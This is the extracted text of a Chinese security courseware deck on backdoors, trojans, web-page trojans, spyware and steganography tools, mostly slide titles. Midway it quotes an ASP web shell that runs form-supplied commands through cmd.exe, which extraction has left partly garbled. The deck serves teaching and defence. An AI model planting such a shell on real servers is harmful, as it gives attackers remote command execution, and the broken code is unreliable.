网络安全后门教程课件.pptVIP

恶意软件（病毒）的分析与防范 Defence analysis of malware;后门;后门的类型;后门的安装;后门举例;其他Windows下的后门程序;网络安全后门教程;无端口后门-如何唤醒;Bits--glacier;GUI(Graphics User Interface)远程控制;VNC;VNC程序举例;后门的启动;检测Windows后门启动技术;AutoRuns的运行界面;如何防御后门 --普通后门;如何防御后门 --无端口后门;2. 特洛伊木马;后门 VS 特洛伊木马;特洛伊木马;网络安全后门教程;2.1名字欺骗;对命名陷阱的防御;2.2 文件捆绑;2.3软件下载;2.4 软件本身带毒;2.5 Html传播;网页病毒的传播方式 ;plmm001.gif ;Flash传播网页;email传播网页;email传播网页;email传播网页;Chm 传播网页木马;exe2bmp;x.htm;x.asp;正常网页中携带;网页病毒、网页木马的原理 ;Javascript.Exception.Exploit ;错误的MIME Multipurpose Internet Mail Extentions ;iframe;Startup.html;HTA的全名为HTML Application;各种溢出型漏洞;木马的发展;% On Error Resume Next% %Set oScript = Server.CreateObject(WSCRIPT.SHELL)% %Set o = Server.CreateObject(Scripting.)% %cmd = Request.Form(.CMD)% %If (cmd ) Then% %szTempFile = C:\\ o( )% %Call oScript.Run (cmd.exe /c cmd szTempFile, 0, True)% %Set oFile = o (szTempFile, 1, False, 0)% %End If % FORM action=%= Request.ServerVariables(URL) % method=POST input type=text name=.CMD size=45 value=%= cmd % input type=submit value=Execute class=input/FORM PRE%If (IsObject(oFile)) Then% %On Error Resume Next% %Response.Write Server.HTMLEncode(o)% %o %Call o(szTempFile, True)% %End If%/PRE ;木马检测工具;木马防线2005+;木马克星;间谍软件;间谍软件发展之初，多被一些在线广告商以及Kazaa等音乐交换网站使用，这些公司将一些监控程序放在用户电脑内监视其网上行为、收集其兴趣爱好，或者在空闲时间进行其它操作。 这些公司以让用户上网免费赚钱或免费获得音乐为幌子，吸引了众多用户下载，而这些软件中所??的间谍程序便悄悄地收集用户信息，然后根据这些信息发送广告，或者把这些收集的信息转卖给其他广告公司获取利益。 ;间谍软件的传播方式;部分间谍和广告软件;Continue;发展趋势;间谍软件检测工具;间谍软件检测工具;间谍软件检测工具; Question？;Hide information in a file;Hide information in a file;InfoStego (Freeware)- Uses BMP carrier files; includes encryption. Invisible Secrets v4.0 (Shareware) - Uses JPEG, PNG, BMP, HTML and WAV carrier files. Includes encryption, shredder, password manager and self-decrypting archives. JPegX (Freeware) - Uses JPEG carrier files and includes encryption and password protection. JP Hide and Seek (Freeware) - Uses JPEG carrier files and includes encryption. JSteg Shell v2.0 (Freeware) - Uses